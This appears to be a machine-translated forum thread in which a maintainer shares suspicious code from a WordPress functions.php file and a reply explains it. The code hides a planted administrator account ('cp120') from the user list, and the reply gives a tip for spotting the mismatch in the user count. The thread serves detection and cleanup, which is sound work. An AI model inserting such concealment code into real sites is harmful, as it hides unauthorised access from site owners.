我有一个客户说他们认为网站被黑客入侵了。我看了一些东西,在他们的functions.php文件中发现了一些可疑的代码。有人认识到这一点并觉得不对吗?
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') {
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
}
}
Wordpress黑客有时会使用此代码或类似的标记。一旦他们通过恶意方法访问您的Wordpress管理员,他们就会创建一个合法的管理员用户,然后将此代码放入您的functions.php文件中,这样当您转到管理员用户部分时,它只显示1个用户。如果你不熟悉php,这里有一个技巧,看看你是否遇到过这种情况。pr不想查看一个长functions.php文件。转到您的管理员用户区域,它将只显示您所知道的管理员用户,但是管理员用户旁边的数字将与显示的用户数量不匹配。它会说(4),但只显示3个名称。
需要注意的是,这段代码可以出于正当理由使用,所以如果你发现这不是由你的网站管理员或开发人员完成的。